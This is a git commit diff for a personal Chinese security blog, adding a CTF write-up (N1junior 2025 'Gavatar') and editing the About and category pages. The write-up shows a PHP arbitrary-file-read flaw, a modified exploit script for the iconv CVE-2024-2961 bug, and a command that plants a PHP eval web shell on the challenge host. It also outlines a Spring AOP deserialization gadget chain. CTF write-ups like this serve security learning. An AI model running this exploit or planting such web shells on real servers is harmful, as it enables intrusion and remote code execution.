update

Author: gsbp

content/post/test.md

@@ -0,0 +1,5 @@
++++
+date = '2025-02-11T23:10:46+08:00'
+draft = true
+title = 'Test'
++++

public/about/index.html

@@ -7,10 +7,9 @@
     <title>About Me | GSBP&#39;s Blog</title>
     <meta name="description"
         content="一名大二在读学生
-Syclover &amp; 0XFFF 成员
-对各种安全感兴趣，目前主要学习的还的是Web安全（Java 安全、云安全等）
+Syclover主力成员
+对各种安全感兴趣，目前主要学习的还的是Web安全（Java 安全、偶然也会学点云安全,等）
 最爱吃，最喜欢吃的是🍉，最喜欢干的事情就是大夏天抱着半个西瓜拿勺子挖着吃然后看视频
-会打点小游戏（其实从小学之前就开始打游戏了hh
 什么都想学，但什么都不会
 Contact Me
 Email:[email protected]
@@ -24,10 +23,9 @@
   <meta property="og:site_name" content="GSBP&#39;s Blog">
   <meta property="og:title" content="About Me">
   <meta property="og:description" content="一名大二在读学生
-Syclover &amp; 0XFFF 成员
-对各种安全感兴趣，目前主要学习的还的是Web安全（Java 安全、云安全等）
+Syclover主力成员
+对各种安全感兴趣，目前主要学习的还的是Web安全（Java 安全、偶然也会学点云安全,等）
 最爱吃，最喜欢吃的是🍉，最喜欢干的事情就是大夏天抱着半个西瓜拿勺子挖着吃然后看视频
-会打点小游戏（其实从小学之前就开始打游戏了hh
 什么都想学，但什么都不会
 Contact Me Email:[email protected]
 GitHub:https://github.com/GSBP0/:">
@@ -40,10 +38,9 @@
   <meta name="twitter:card" content="summary">
   <meta name="twitter:title" content="About Me">
   <meta name="twitter:description" content="一名大二在读学生
-Syclover &amp; 0XFFF 成员
-对各种安全感兴趣，目前主要学习的还的是Web安全（Java 安全、云安全等）
+Syclover主力成员
+对各种安全感兴趣，目前主要学习的还的是Web安全（Java 安全、偶然也会学点云安全,等）
 最爱吃，最喜欢吃的是🍉，最喜欢干的事情就是大夏天抱着半个西瓜拿勺子挖着吃然后看视频
-会打点小游戏（其实从小学之前就开始打游戏了hh
 什么都想学，但什么都不会
 Contact Me Email:[email protected]
 GitHub:https://github.com/GSBP0/:">
@@ -164,10 +161,9 @@ <h1>GSBP&#39;s Blog</h1>
         <h1 class="title is-1">About Me</h1>
         <div class="content about-content">
             <p>一名大二在读学生</p>
-<p>Syclover &amp; 0XFFF 成员</p>
-<p>对各种安全感兴趣，目前主要学习的还的是Web安全（Java 安全、云安全等）</p>
+<p>Syclover主力成员</p>
+<p>对各种安全感兴趣，目前主要学习的还的是Web安全（Java 安全、偶然也会学点云安全,等）</p>
 <p>最爱吃，最喜欢吃的是🍉，最喜欢干的事情就是大夏天抱着半个西瓜拿勺子挖着吃然后看视频</p>
-<p>会打点小游戏（其实从小学之前就开始打游戏了hh</p>
 <p><strong>什么都想学，但什么都不会</strong></p>
 <h1 id="contact-me">Contact Me</h1>
 <p>Email:[email protected]</p>

public/categories/index.html

@@ -149,14 +149,14 @@ <h1>Categories</h1>
 
         <div class="card">
 
-                    <a href="http://localhost:1313/categories/java%E5%AE%89%E5%85%A8/">
+                    <a href="http://localhost:1313/categories/wp/">
                     </a>
                 <div class="card-content has-text-centered">
                     <div>
-                        <a class="title is-5 is-size-6-mobile" href="http://localhost:1313/categories/java%E5%AE%89%E5%85%A8/">Java安全</a>
+                        <a class="title is-5 is-size-6-mobile" href="http://localhost:1313/categories/wp/">WP</a>
 
                         <strong>
-                        <sup style="font-size:16px;">2</sup>
+                        <sup style="font-size:16px;">3</sup>
                         </strong>
                     </div>
                 </div>
@@ -165,11 +165,11 @@ <h1>Categories</h1>
 
         <div class="card">
 
-                    <a href="http://localhost:1313/categories/wp/">
+                    <a href="http://localhost:1313/categories/java%E5%AE%89%E5%85%A8/">
                     </a>
                 <div class="card-content has-text-centered">
                     <div>
-                        <a class="title is-5 is-size-6-mobile" href="http://localhost:1313/categories/wp/">WP</a>
+                        <a class="title is-5 is-size-6-mobile" href="http://localhost:1313/categories/java%E5%AE%89%E5%85%A8/">Java安全</a>
 
                         <strong>
                         <sup style="font-size:16px;">2</sup>

public/categories/index.xml

@@ -6,21 +6,21 @@
     <description>Recent content in Categories on GSBP&#39;s Blog</description>
     <generator>Hugo</generator>
     <language>en-us</language>
-    <lastBuildDate>Thu, 23 Jan 2025 23:33:31 +0800</lastBuildDate>
+    <lastBuildDate>Tue, 11 Feb 2025 23:00:00 +0800</lastBuildDate>
     <atom:link href="http://localhost:1313/categories/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>WP</title>
+      <link>http://localhost:1313/categories/wp/</link>
+      <pubDate>Tue, 11 Feb 2025 23:00:00 +0800</pubDate>
+      <guid>http://localhost:1313/categories/wp/</guid>
+      <description></description>
+    </item>
     <item>
       <title>Java安全</title>
       <link>http://localhost:1313/categories/java%E5%AE%89%E5%85%A8/</link>
       <pubDate>Thu, 23 Jan 2025 23:33:31 +0800</pubDate>
       <guid>http://localhost:1313/categories/java%E5%AE%89%E5%85%A8/</guid>
       <description></description>
     </item>
-    <item>
-      <title>WP</title>
-      <link>http://localhost:1313/categories/wp/</link>
-      <pubDate>Mon, 20 Jan 2025 03:02:14 +0800</pubDate>
-      <guid>http://localhost:1313/categories/wp/</guid>
-      <description></description>
-    </item>
   </channel>
 </rss>

public/categories/java安全/index.xml

@@ -13,7 +13,7 @@
       <link>http://localhost:1313/post/springaop/</link>
       <pubDate>Thu, 23 Jan 2025 23:33:31 +0800</pubDate>
       <guid>http://localhost:1313/post/springaop/</guid>
-      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;&#xA;&lt;p&gt;在浏览文章的时候看见有师傅发现了一条仅依赖于Springboot中的SpringAOP的链，于是自己调试学习了一下&lt;/p&gt;&#xA;&lt;h2 id=&#34;正文&#34;&gt;正文&lt;/h2&gt;&#xA;&lt;p&gt;依赖于Spring-AOP和aspectjweaver两个包，但是springboot中的spring-boot-starter-aop自带包含这俩类，可以说是和Jackson一样通杀springboot的链子了&lt;/p&gt;&#xA;&lt;h3 id=&#34;流程&#34;&gt;流程&lt;/h3&gt;&#xA;&lt;p&gt;调用链如下&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;JdkDynamicAopProxy.invoke()-&amp;gt;&#xD;&#xA;ReflectiveMethodInvocation.proceed()-&amp;gt;&#xD;&#xA;AspectJAroundAdvice-&amp;gt;invoke-&amp;gt;&#xD;&#xA;org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod()-&amp;gt;&#xD;&#xA;method.invoke()&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;执行类是&lt;code&gt;org.springframework.aop.aspectj.AbstractAspectJAdvice&lt;/code&gt;的&lt;strong&gt;invokeAdviceMethodWithGivenArgs&lt;/strong&gt;方法&lt;/p&gt;&#xA;&lt;p&gt;![image-20250123020448769](/Users/gsbp/Library/Application Support/typora-user-images/image-20250123020448769.png)&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;    protected Object invokeAdviceMethodWithGivenArgs(Object[] args) throws Throwable {&#xD;&#xA;        Object[] actualArgs = args;&#xD;&#xA;        if (this.aspectJAdviceMethod.getParameterCount() == 0) {&#xD;&#xA;            actualArgs = null;&#xD;&#xA;        }&#xD;&#xA;&#xD;&#xA;        try {&#xD;&#xA;            ReflectionUtils.makeAccessible(this.aspectJAdviceMethod);&#xD;&#xA;            return this.aspectJAdviceMethod.invoke(this.aspectInstanceFactory.getAspectInstance(), actualArgs);&#xD;&#xA;        } catch (IllegalArgumentException ex) {&#xD;&#xA;            throw new AopInvocationException(&amp;#34;Mismatch on arguments to advice method [&amp;#34; + this.aspectJAdviceMethod + &amp;#34;]; pointcut expression [&amp;#34; + this.pointcut.getPointcutExpression() + &amp;#34;]&amp;#34;, ex);&#xD;&#xA;        } catch (InvocationTargetException ex) {&#xD;&#xA;            throw ex.getTargetException();&#xD;&#xA;        }&#xD;&#xA;    }&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;直接在AOP依赖下的一个sink点，有着反射执行任意方法的能力，操作空间很大&lt;/p&gt;</description>
+      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;&#xA;&lt;p&gt;在浏览文章的时候看见有师傅发现了一条仅依赖于Springboot中的SpringAOP的链，于是自己调试学习了一下&lt;/p&gt;&#xA;&lt;h2 id=&#34;正文&#34;&gt;正文&lt;/h2&gt;&#xA;&lt;p&gt;依赖于Spring-AOP和aspectjweaver两个包，但是springboot中的spring-boot-starter-aop自带包含这俩类&lt;/p&gt;&#xA;&lt;h3 id=&#34;流程&#34;&gt;流程&lt;/h3&gt;&#xA;&lt;p&gt;调用链如下&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;JdkDynamicAopProxy.invoke()-&amp;gt;&#xD;&#xA;ReflectiveMethodInvocation.proceed()-&amp;gt;&#xD;&#xA;AspectJAroundAdvice-&amp;gt;invoke-&amp;gt;&#xD;&#xA;org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod()-&amp;gt;&#xD;&#xA;method.invoke()&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;执行类是&lt;code&gt;org.springframework.aop.aspectj.AbstractAspectJAdvice&lt;/code&gt;的&lt;strong&gt;invokeAdviceMethodWithGivenArgs&lt;/strong&gt;方法&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://tuchuang-1322176132.cos.ap-chengdu.myqcloud.com//imgimage-20250123020448769.png&#34; alt=&#34;image-20250123020448769&#34;&gt;&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;    protected Object invokeAdviceMethodWithGivenArgs(Object[] args) throws Throwable {&#xD;&#xA;        Object[] actualArgs = args;&#xD;&#xA;        if (this.aspectJAdviceMethod.getParameterCount() == 0) {&#xD;&#xA;            actualArgs = null;&#xD;&#xA;        }&#xD;&#xA;&#xD;&#xA;        try {&#xD;&#xA;            ReflectionUtils.makeAccessible(this.aspectJAdviceMethod);&#xD;&#xA;            return this.aspectJAdviceMethod.invoke(this.aspectInstanceFactory.getAspectInstance(), actualArgs);&#xD;&#xA;        } catch (IllegalArgumentException ex) {&#xD;&#xA;            throw new AopInvocationException(&amp;#34;Mismatch on arguments to advice method [&amp;#34; + this.aspectJAdviceMethod + &amp;#34;]; pointcut expression [&amp;#34; + this.pointcut.getPointcutExpression() + &amp;#34;]&amp;#34;, ex);&#xD;&#xA;        } catch (InvocationTargetException ex) {&#xD;&#xA;            throw ex.getTargetException();&#xD;&#xA;        }&#xD;&#xA;    }&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;直接在AOP依赖下的一个sink点，有着反射执行任意方法的能力，操作空间很大&lt;/p&gt;</description>
     </item>
     <item>
       <title>JDK17打Jackson&#43;LdapAttruibute反序列化</title>

public/categories/wp/index.html

@@ -145,6 +145,16 @@ <h2 class="archive-title">Category: WP</h2>
 
 
 
+        <article class="archive-item">
+            <a href="http://localhost:1313/post/2025n1junior-wp/" class="archive-item-link hover-underline-animation">[2025]N1junior-WP</a>
+            <span class="archive-item-date">
+                February 11, 2025
+            </span>
+
+        </article>
+
+    
+
         <article class="archive-item">
             <a href="http://localhost:1313/post/jdk17%E6%89%93jackson&#43;ldapattruibute%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="archive-item-link hover-underline-animation">JDK17打Jackson&#43;LdapAttruibute反序列化</a>
             <span class="archive-item-date">

public/categories/wp/index.xml

@@ -6,8 +6,15 @@
     <description>Recent content in WP on GSBP&#39;s Blog</description>
     <generator>Hugo</generator>
     <language>en-us</language>
-    <lastBuildDate>Mon, 20 Jan 2025 03:02:14 +0800</lastBuildDate>
+    <lastBuildDate>Tue, 11 Feb 2025 23:00:00 +0800</lastBuildDate>
     <atom:link href="http://localhost:1313/categories/wp/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>[2025]N1junior-WP</title>
+      <link>http://localhost:1313/post/2025n1junior-wp/</link>
+      <pubDate>Tue, 11 Feb 2025 23:00:00 +0800</pubDate>
+      <guid>http://localhost:1313/post/2025n1junior-wp/</guid>
+      <description>&lt;h2 id=&#34;gavatar&#34;&gt;Gavatar&lt;/h2&gt;&#xA;&lt;p&gt;一个php服务&lt;/p&gt;&#xA;&lt;p&gt;这里看upload.php有着很明显的任意文件读的漏洞，只需要post一个url参数就可以&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;if (!empty($_FILES[&amp;#39;avatar&amp;#39;][&amp;#39;tmp_name&amp;#39;])) {&#xA;    $finfo = new finfo(FILEINFO_MIME_TYPE);&#xA;    if (!in_array($finfo-&amp;gt;file($_FILES[&amp;#39;avatar&amp;#39;][&amp;#39;tmp_name&amp;#39;]), [&amp;#39;image/jpeg&amp;#39;, &amp;#39;image/png&amp;#39;, &amp;#39;image/gif&amp;#39;])) {&#xA;        die(&amp;#39;Invalid file type&amp;#39;);&#xA;    }&#xA;    move_uploaded_file($_FILES[&amp;#39;avatar&amp;#39;][&amp;#39;tmp_name&amp;#39;], $avatarPath);&#xA;} elseif (!empty($_POST[&amp;#39;url&amp;#39;])) {&#xA;    $image = @file_get_contents($_POST[&amp;#39;url&amp;#39;]);&#xA;    if ($image === false) die(&amp;#39;Invalid URL&amp;#39;);&#xA;    file_put_contents($avatarPath, $image);&#xA;}&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;flag也不能直接读，需要rce调用/readflag，然后就开始想能不能和其他php文件下的漏洞一起利用&lt;/p&gt;&#xA;&lt;p&gt;也是没有其他能够接着利用的漏洞了，然后看到php版本是8.3.4，就想到那个iconv的漏洞利用&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ambionics.io/blog/iconv-cve-2024-2961-p1&#34;&gt;https://www.ambionics.io/blog/iconv-cve-2024-2961-p1&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;因为不是直接返回文件内容，而是需要我们从&lt;code&gt;avatar.php&lt;/code&gt;中获取，这里需要稍微改一下脚本中的download函数，要提前注册一个用户，然后把session和user填上即可&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;    def download(self, path: str) -&amp;gt; bytes:&#xA;        &amp;#34;&amp;#34;&amp;#34;Returns the contents of a remote file.&#xA;        &amp;#34;&amp;#34;&amp;#34;&#xA;        path = f&amp;#34;php://filter/convert.base64-encode/resource={path}&amp;#34;&#xA;        self.send(path)&#xA;        response=self.session.get(&amp;#34;http://39.106.16.204:20871/avatar.php?user=123&amp;#34;)&#xA;        print(response)&#xA;        data = response.text&#xA;        return base64.decode(data)&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;然后跑exp就好了&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;python test.py http://39.106.16.204:20871/upload.php &amp;#34;echo &amp;#39;&amp;lt;?=@eval(\$_POST[0]);?&amp;gt;&amp;#39; &amp;gt; shell.php&amp;#34;&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;img src=&#34;https://tuchuang-1322176132.cos.ap-chengdu.myqcloud.com//imgimage-20250211210919337.png&#34; alt=&#34;image-20250211210919337&#34;&gt;&lt;/p&gt;</description>
+    </item>
     <item>
       <title>JDK17打Jackson&#43;LdapAttruibute反序列化</title>
       <link>http://localhost:1313/post/jdk17%E6%89%93jackson&#43;ldapattruibute%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/</link>

public/index.html

@@ -188,6 +188,58 @@ <h1 id="home-title" class="title is-1 ">GSBP&#39;s Blog</h1>
     </div></article>
 <div class="summary">
 
+        <article class="post">
+  <div class="single-container column is-centered">
+    <div class="archive" id="post-container">
+      <header class="post-header">
+        <h1 class="post-title hover-underline-animation"><a class="post-link" href="/post/2025n1junior-wp/">[2025]N1junior-WP</a></h1>
+       
+       
+      </header>
+      <div class="post-content">
+        <div class="excerpt post-summary">
+          <h2 id="gavatar">Gavatar</h2>
+<p>一个php服务</p>
+<p>这里看upload.php有着很明显的任意文件读的漏洞，只需要post一个url参数就可以</p>
+<pre tabindex="0"><code>if (!empty($_FILES[&#39;avatar&#39;][&#39;tmp_name&#39;])) {
+    $finfo = new finfo(FILEINFO_MIME_TYPE);
+    if (!in_array($finfo-&gt;file($_FILES[&#39;avatar&#39;][&#39;tmp_name&#39;]), [&#39;image/jpeg&#39;, &#39;image/png&#39;, &#39;image/gif&#39;])) {
+        die(&#39;Invalid file type&#39;);
+    }
+    move_uploaded_file($_FILES[&#39;avatar&#39;][&#39;tmp_name&#39;], $avatarPath);
+} elseif (!empty($_POST[&#39;url&#39;])) {
+    $image = @file_get_contents($_POST[&#39;url&#39;]);
+    if ($image === false) die(&#39;Invalid URL&#39;);
+    file_put_contents($avatarPath, $image);
+}
+</code></pre><p>flag也不能直接读，需要rce调用/readflag，然后就开始想能不能和其他php文件下的漏洞一起利用</p>
+<p>也是没有其他能够接着利用的漏洞了，然后看到php版本是8.3.4，就想到那个iconv的漏洞利用</p>
+<p><a href="https://www.ambionics.io/blog/iconv-cve-2024-2961-p1">https://www.ambionics.io/blog/iconv-cve-2024-2961-p1</a></p>
+<p>因为不是直接返回文件内容，而是需要我们从<code>avatar.php</code>中获取，这里需要稍微改一下脚本中的download函数，要提前注册一个用户，然后把session和user填上即可</p>
+<pre tabindex="0"><code>    def download(self, path: str) -&gt; bytes:
+        &#34;&#34;&#34;Returns the contents of a remote file.
+        &#34;&#34;&#34;
+        path = f&#34;php://filter/convert.base64-encode/resource={path}&#34;
+        self.send(path)
+        response=self.session.get(&#34;http://39.106.16.204:20871/avatar.php?user=123&#34;)
+        print(response)
+        data = response.text
+        return base64.decode(data)
+</code></pre><p>然后跑exp就好了</p>
+<pre tabindex="0"><code>python test.py http://39.106.16.204:20871/upload.php &#34;echo &#39;&lt;?=@eval(\$_POST[0]);?&gt;&#39; &gt; shell.php&#34;
+</code></pre><p><img src="https://tuchuang-1322176132.cos.ap-chengdu.myqcloud.com//imgimage-20250211210919337.png" alt="image-20250211210919337"></p>
+        </div>
+        
+        <div class="post-time-container">
+          <span class="post-time"> 2025-02-11 </span>
+        </div>
+      </div>
+      
+    </div>
+  </div>
+</article>
+
+    
         <article class="post">
   <div class="single-container column is-centered">
     <div class="archive" id="post-container">
@@ -201,7 +253,7 @@ <h1 class="post-title hover-underline-animation"><a class="post-link" href="/pos
           <h2 id="前言">前言</h2>
 <p>在浏览文章的时候看见有师傅发现了一条仅依赖于Springboot中的SpringAOP的链，于是自己调试学习了一下</p>
 <h2 id="正文">正文</h2>
-<p>依赖于Spring-AOP和aspectjweaver两个包，但是springboot中的spring-boot-starter-aop自带包含这俩类，可以说是和Jackson一样通杀springboot的链子了</p>
+<p>依赖于Spring-AOP和aspectjweaver两个包，但是springboot中的spring-boot-starter-aop自带包含这俩类</p>
 <h3 id="流程">流程</h3>
 <p>调用链如下</p>
 <pre tabindex="0"><code>JdkDynamicAopProxy.invoke()-&gt;
@@ -210,7 +262,7 @@ <h3 id="流程">流程</h3>
 org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod()-&gt;
 method.invoke()
 </code></pre><p>执行类是<code>org.springframework.aop.aspectj.AbstractAspectJAdvice</code>的<strong>invokeAdviceMethodWithGivenArgs</strong>方法</p>
-<p>![image-20250123020448769](/Users/gsbp/Library/Application Support/typora-user-images/image-20250123020448769.png)</p>
+<p><img src="https://tuchuang-1322176132.cos.ap-chengdu.myqcloud.com//imgimage-20250123020448769.png" alt="image-20250123020448769"></p>
 <pre tabindex="0"><code>    protected Object invokeAdviceMethodWithGivenArgs(Object[] args) throws Throwable {
         Object[] actualArgs = args;
         if (this.aspectJAdviceMethod.getParameterCount() == 0) {